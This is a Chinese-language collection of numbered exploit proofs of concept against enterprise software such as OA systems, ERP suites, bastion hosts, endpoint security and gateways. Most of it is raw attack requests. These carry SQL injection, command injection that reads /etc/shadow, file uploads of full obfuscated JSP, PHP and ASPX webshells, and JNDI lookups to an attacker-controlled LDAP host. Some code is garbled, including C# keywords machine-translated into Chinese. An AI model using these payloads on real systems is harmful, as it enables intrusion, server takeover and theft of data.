User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://*.*.*.*
Referer: http://*.*.*.*/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7
Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set//global//general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码
POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1
Host: *.*.*.*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101
Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 222
Origin: http://*.*.*.*
Connection: close
Referer: http://*.*.*.*/index.php
{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:
http://*.*.*.*/check_login2.php
设置日志php文件
Plaintext
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: 192.168.24.3:6868
Content-Length: 195
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.24.3:6868
Referer: http://192.168.24.3:6868/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7
Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-
AE5A","id":"111;set//global//general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f6368656
36b5f6c6f67696e322e706870;","type":"0"}}
写入php代码
Plaintext
POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1
Host: 192.168.24.3:6868
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101
Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 222
Origin: http://192.168.24.3:6868
Connection: close
Referer: http://192.168.24.3:6868/index.php
{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-
76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-
AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:
Plaintext
http://192.168.24.3:6868/check_login2.php
78、Panabit iXCache网关RCE漏洞CVE-2023-38646
POST /cgi-bin/Maintain/date_config HTTP/1.1
Host: 127.0.0.1:8443
Cookie: pauser_9667402_260=paonline_admin_44432_9663; pauser_9661348_661=paonline_admin_61912_96631
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp179、金和OA C6-GetSgIData.aspx SQL注入漏洞
POST /c6/Contro/GetSglData.aspx/.ashx
Host: ip.port
User-Agent: Mozillal5.0 (Windows NT 5.1) AppleWebkit/537.36(KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537 36
Connection: close
Content-Length.189
Content-Type. text/plain
Accept-Encoding: gzip
exec master..xp cmdshell 'ipconfig'80、致远OA任意管理员登录
POST /seeyon/thirdpartyController.do HTTP/1.1
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.181、用友nc-cloudRCE
漏洞影响
NC63、NC633、NC65
NC Cloud1903、NC Cloud1909
NC Cloud2005、NC Cloud2105、NC Cloud2111
YonBIP高级版2207
先发送数据包,返回200
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: 127.0.0.1:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookiets=168170496; JSESSIONID=33A343770FF.server
If-None-Match: W/"1571-1589211696000"
If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 249
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}再发送数据包执行命令,返回命令执行结果
POST /404.jsp?error=bsh.Interpreter HTTP/1.1
Host: 127.0.0.1:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookiets=1681785232226; JSESSIONID=334D3ED07A343770FF.server
If-None-Match: W/"1571-1589211696000"
If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ping 8.8.8.8").getInputStream())82、用友 NC Cloud jsinvoke 任意文件上传漏洞
用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限
app="用友-NC-Cloud"
POST /uapjs/jsinvoke/?action=invoke
Content-Type: application/json
{
"serviceName": "nc.itf.iufo.IBaseSPService",
"methodName": "saveXStreamConfig",
"parameterTypes": [
"java.lang.Object",
"java.lang.String"
],
"parameters": [
"${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
"webapps/nc_web/407.jsp"
]
}
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host:
Connection: Keep-Alive
Content-Length: 253
Content-Type: application/x-www-form-urlencoded
{
"serviceName": "nc.itf.iufo.IBaseSPService",
"methodName": "saveXStreamConfig",
"parameterTypes": [
"java.lang.Object",
"java.lang.String"
],
"parameters": [
"${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}",
"webapps/nc_web/301.jsp"
]
}83、亿赛通 /UploadFileFromClientServiceForClient 任意文件上传漏洞
漏洞描述:亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全防护软件。亿赛通电子文档安全管理系统任意文件上传
POST /CDGServer3/UploadFileFromClientServiceForClient?AHECJIIACHMDAPKFAPLPFJPJHAHIDMFNKENDCLKLHFEKNDMAHGHOJBPEBEBCNIODHIKOBGFOMCPECDMKOHHIKOIPOPMMIOJDEACILAMPMLNLMELAMHAGGJMDLBCGCECCPKMMEIOKCBDGKHPDPFMLNPEKJHDEHNHFHILECBAJELDJNDBAEHOIIKDMHGOEHBIBHCAMDBBLHJGNCCPKDGLABEFHOKDPAKDCMIOHIFJAGCBPOMIKLMGBAGCNBGEGNKGABCOKEIJCMOMKEAKDALJEHMEIPHLLBJPCJIIPAFACIJKGABAFFDEDCAHOALGIGLKBFIFBFCGGBJFOGEGG HTTP/1.1
Accept: text/html,application/json,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 1782
Content-Type: application/xml;charset=UTF-8
Cookie: JSESSIONID=A00E152C6F1163D70C172BDCF32D9880
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.80.9:8443
Connection: close
Hello Administrator
WelCome To Java Console!<%@page import="sun.misc.*,javax.crypto.Cipher,javax.crypto.spec.SecretKeySpec,java.util.Random" %>
<%!
class tas9er0s extends \u0043l\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072 {
tas9er0s(\u0043l\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072 tas9er9V) {
super(tas9er9V);
}
public Class tas9er33(byte[] tas9er0x) {
return super.d\uuuuuuuuu0065fineClass(tas9er0x,0,tas9er0x.length);
}
}
%><%
out.println("Random Garbage Data:");
Random tas9erUi = new Random();
int tas9erk1 = tas9erUi.nextInt(1234);
int tas9erQ5 = tas9erUi.nextInt(5678);
int tas9er4l = tas9erUi.nextInt(1357);
int tas9er13 = tas9erUi.nextInt(2468);
out.println(tas9erk1+","+tas9erQ5+","+tas9er4l+","+tas9er13);
String[] tas9erlq = new String[]{"A", "P", "B", "O", "C", "S", "D", "T"};
String tas9er08 = tas9erlq[1] + tas9erlq[3] + tas9erlq[5] + tas9erlq[7];
if (request.getMethod().equals(tas9er08)) {
String tas9erua = new String(new B\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072().decodeBuffer("MTZhY2FjYzA1YWFmYWY2Nw=="));
session.setAttribute("u", tas9erua);
Cipher tas9er5L = Cipher.getInstance("AES");
tas9er5L.init(((tas9erk1 * tas9erQ5 + tas9er4l - tas9er13) * 0) + 3 - 1, new SecretKeySpec(tas9erua.getBytes(), "AES"));
new tas9er0s(this.\u0067\u0065t\u0043\u006c\u0061\u0073\u0073().\u0067\u0065t\u0043\u006c\u0061\u0073\u0073Loader()).tas9er33(tas9er5L.doFinal(new sun.misc.B\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
}
%>
shell
https://192.168.80.9:8443/CDGServer3/favicat.jsp漏洞危害:攻击者可以上传恶意文件,获得服务器权限
修复方法
官网已发布安全修复版本,请升级至官网最新版本
https://www.esafenet.com/
84、Jeecg-Boot Freemarker 模版注入漏洞
漏洞危害
1、如果被攻击者利用,可直接getshell;
2、如果被攻击者利用,可被用于内网信息收集,扫描目标内网主机;
3、如果被攻击者利用,可攻击运行在内网或本地的应用程序;
4、如果被攻击者利用,可被用作攻击跳板;
修复方法
Jeecg官方暂未修复该漏洞,无法通过升级JeecgBoot版本修复该漏洞,建议:
1、临时禁用Freemarker高危的代码执行类,如:freemarker.template.utility.Execute(ftl利用方式较多,请自行判断)
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025","id":"1"}85、远秋医学技能考试系统SQL注入
sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=7" -p id -batch86、新开普智慧校园系统代码执行漏洞
漏洞详情
新开普智慧校园系统/service_transport/service.action接口处存在FreeMarker模板注入,攻击者可在未经身份认证的情况下,调用后台接口,构造恶意代码实现远程代码执行,最终可造成服务器失陷。
路径存在则漏洞存在
http://xxx.com/service_transport/service.action
纯文本
poc没回显
POST /service_transport/service.action HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo PCUhCiAgICBjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIgewogICAgICAgIFUoQ2xhc3NMb2FkZXIgYykgewogICAgICAgICAgICBzdXBlcihjKTsKICAgICAgICB9CiAgICAgICAgcHVibGljIENsYXNzIGcoYnl0ZVtdIGIpIHsKICAgICAgICAgICAgcmV0dXJuIHN1cGVyLmRlZmluZUNsYXNzKGIsIDAsIGIubGVuZ3RoKTsKICAgICAgICB9CiAgICB9CiAKICAgIHB1YmxpYyBieXRlW10gYmFzZTY0RGVjb2RlKFN0cmluZyBzdHIpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOwogICAgICAgICAgICByZXR1cm4gKGJ5dGVbXSkgY2xhenouZ2V0TWV0aG9kKCJkZWNvZGVCdWZmZXIiLCBTdHJpbmcuY2xhc3MpLmludm9rZShjbGF6ei5uZXdJbnN0YW5jZSgpLCBzdHIpOwogICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkJhc2U2NCIpOwogICAgICAgICAgICBPYmplY3QgZGVjb2RlciA9IGNsYXp6LmdldE1ldGhvZCgiZ2V0RGVjb2RlciIpLmludm9rZShudWxsKTsKICAgICAgICAgICAgcmV0dXJuIChieXRlW10pIGRlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZSIsIFN0cmluZy5jbGFzcykuaW52b2tlKGRlY29kZXIsIHN0cik7CiAgICAgICAgfQogICAgfQolPgo8JQogICAgU3RyaW5nIGNscyA9IHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwYXNzd2QiKTsKICAgIGlmIChjbHMgIT0gbnVsbCkgewogICAgICAgIG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGJhc2U2NERlY29kZShjbHMpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7CiAgICB9CiU+ >./webapps/ROOT/1.txt\")}"
}纯文本
文件转换为jsp
POST /service_transport/service.action HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c certutil -decode ./webapps/ROOT/1.txt ./webapps/ROOT/1.jsp\")}"
}87、拓尔思 MAS 任意文件上传漏洞
暂无poc
88、金山终端安全系统V9任意文件上传漏洞
POST /inter/software_relation.php HTTP/1.1
Host: 192.168.249.137:6868
Content-Length: 1557
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://192.168.249.137:6868
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close ------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolFileName" ../../datav.php ------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolDescri" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="id" ------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="version" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="sofe_typeof" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="fileSize" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="param" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolName" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolImage"; filename="3.php" Content-Type: image/png <?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?> ------WebKitFormBoundaryxRP5VjBKdqBrCixM
89、Eramba任意代码执行漏洞
GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1
Host: [redacted]
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/settings
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 500 Internal Server Error
Date: Fri, 31 Mar 2023 12:37:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Access-Control-Allow-Origin: *
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="test.pdf"
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2033469
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Error: The exit status code '127' says something went wrong:
stderr: "sh: 1: --dpi: not found
"
stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether [redacted] brd ff:ff:ff:ff:ff:ff
inet [redacted] brd [redacted] scope global ens33
valid_lft forever preferred_lft forever
inet6 [redacted] scope link
valid_lft forever preferred_lft forever
"
command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'
--margin-right '0' --margin-top '0' --orientation 'Landscape'
--javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html'
'/tmp/knp_snappy6426d423104587.46971034.pdf'. </title>
[...]90、Adobe ColdFusion 反序列化漏洞CVE-2023-29300
POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 1.2.3.4:1234
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id
argumentCollection=
<wddxPacket version='1.0'>
<header/>
<data>
<struct type='xcom.sun.rowset.JdbcRowSetImplx'>
<var name='dataSourceName'>
<string>ldap://xxx.xxx.xxx:1234/Basic/TomcatEcho</string>
</var>
<var name='autoCommit'>
<boolean value='true'/>
</var>
</struct>
</data>
</wddxPacket>91、1Panel loadfile 后台文件读取漏洞
漏洞描述
1Panel后台存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息文件
POC
POST /api/v1/file/loadfile {"paht":"/etc/passwd"}漏洞复现
登陆页面
92、金蝶云星空 CommonFileserver 任意文件读取漏洞
GET /CommonFileServer/c:/windows/win.ini93、CODING平台idna目录存在目录遍历漏洞
Coding.net 是一个面向开发者的云端开发平台,提供 Git/SVN 代码托管、任务管理,在idna存在目录泄露漏洞,攻击者可获取目录文件信息。
检索条件: title="一站式软件研发管理平台"
relative: req0
session: false
requests:
\- method: GET
timeout: 10
path: /ci/pypi/simple/idna/
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/69.0.2786.81 Safari/537.36
follow_redirects: true
matches: (code.eq("200") && body.contains("Index of"))94、中远麒麟堡垒机 admin.php SQL注入
麒麟堡垒机用于运维管理的认证、授权、审计等监控管理。中远麒麟堡垒机存在SQL注入,可利用该漏洞获取系统敏感信息。
检索条件:
cert="Baolei"||title="麒麟堡垒机"||body="admin.php?controller=admin_index&action=get_user_login_fristauth"||body="admin.php?controller=admin_index&action=login"
relative: req0 && req1
session: false
requests:
- method: POST
timeout: 10
path: /admin.php?controller=admin_commonuser
headers:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/69.0.2786.81 Safari/537.36
data: username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
follow_redirects: true
matches: (code.eq("200") && time.gt("5") && time.lt("10"))
- method: POST
timeout: 10
path: /admin.php?controller=admin_commonuser
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/69.0.2786.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded
data: username=admin
follow_redirects: true
matches: time.lt("5")95、用友NC存在JNDI注入漏洞
待补充。
96、OfficeWeb365 远程代码执行漏洞
【消息详情】:360漏洞云监测到网传《OfficeWeb365 远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002453,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
360漏洞云监测到网传《OfficeWeb365远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经升级漏洞云情报平台,平台编号: 360LDYLD-2023-00002453
详细
POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1
主持人:xxx
用户代理:Mozilla/5.0(Macintosh;Intel Mac OS X 10_15_7)AppleWebKit/537.36(KHTML,如 Gecko)Chrome/88.0.434.18 Safari/537.36
内容长度:2265
内容类型:application/x-www-form-urlencoded
接受编码:gzip、deflate
连接:关闭
数据:image/png;base64,01s34567890123456789y12345678901234567m91<%@ 页面语言="C#" %>
<%@Import 命名空间="System.Reflection" %>
<脚本运行=“服务器”>
私有字节[]解密(字节[]数据)
{
字符串键=“e45e329feb5d925b”;
数据 = Convert.FromBase64String(System.Text.Encoding.UTF8.GetString(data));
System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
aes.Mode = System.Security.Cryptography.CipherMode.ECB;
aes.Key = Encoding.UTF8.GetBytes(key);
aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
return aes.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
}
私有字节[]加密(字节[]数据)
{
字符串键=“e45e329feb5d925b”;
System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
aes.Mode = System.Security.Cryptography.CipherMode.ECB;
aes.Key = Encoding.UTF8.GetBytes(key);
aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
返回 System.Text.Encoding.UTF8.GetBytes(Convert.ToBase64String(aes.CreateEncryptor().TransformFinalBlock(data, 0, data.Length)));
}
</脚本>
<%
//byte[] c=Request.BinaryRead(Request.ContentLength);Assembly.Load(Decrypt(c)).CreateInstance("U").Equals(this);
byte[] c=Request.BinaryRead(Request.ContentLength);
string asname=System.Text.Encoding.ASCII.GetString(new byte[] {0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f, 0x6e,0x2e,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79});
类型程序集=Type.GetType(asname);
MethodInfo load = assembly.GetMethod("Load",new Type[] {new byte[0].GetType()});
对象 obj=load.Invoke(null, new object[]{Decrypt(c)});
MethodInfo create = assembly.GetMethod("CreateInstance",new Type[] { "".GetType()});
字符串名称 = System.Text.Encoding.ASCII.GetString(new byte[] { 0x55 });
object pay=create.Invoke(obj,new object[] { name });
pay.Equals(this);%>>---97、gitlab路径遍历读取任意文件漏洞
可能需要登录
GET /group1/group2/group3/group4/group5/group6/group7/group8/group9/project9/uploads/4e02c376ac758e162ec674399741e38d//..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
# 98、Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞
title="index" && header="lighttpd/1.4.30"
/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.130303344313792199、傲盾信息安全管理系统前台远程命令执行漏洞
漏洞描述:信息安全管理系统(ISMS)是IDC/ISP业务经营者建设的具有基础数据管理、 访问日志管理、信息安全管理等功能的信息安全管理系统,该漏洞可未授权的情况下直接执行任意命令
相关信息:
/user_management/sichuan_login
请求体:
loginname=sysadmin&ticket=
100、蓝凌EKP系统存在未授权访问漏洞A
漏洞描述:蓝凌EKP由深圳市蓝凌软件股份有限公司自出研发,是一款全程在线数字化OA,应用于大中型企业在线化办公。 包含流程管理、知识管理、会议管理、公文管理、任务管理及督办管理等100个功能模块。。攻击者可利用漏洞获取大量敏感信息。
Condition: body="蓝凌云服务平台"||(body="Landray"&&body="登录系统")||body="/scripts/jquery.landray.common.js"||body="java.landray.com.cn"||body="蓝凌软件"
||(body="StylePath" && body="encryptPassword")
relative: req0
session: false
requests:
- method: GET
timeout: 10
path: /./ui-ext/./behavior/
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/84.0.850.132 Safari/537.36
follow_redirects: false
matches: (code.eq("200") && body.contains("ekp_server.log"))101、中远麒麟堡垒机tokens SQL注入
cert="Baolei"||title="麒麟堡垒机"||body="admin.php?controller=admin_index&action=get_user_login_fristauth"||body="admin.php?controller=admin_index&action=login"
POC
relative: req0 && req1
session: false
requests:
- method: POST
timeout: 10
path: /baoleiji/api/tokens
headers:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/89.0.3119.54 Safari/537.36
data: constr=1' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm&title=%40127.0.0.1
follow_redirects: true
matches: (time.gt("5") && time.lt("10"))
- method: POST
timeout: 10
path: /baoleiji/api/tokens
headers:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/89.0.3119.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
data: constr=1&title=%40127.0.0.1
follow_redirects: true
matches: time.lt("5")102、明源ERP存在SQL时间盲注
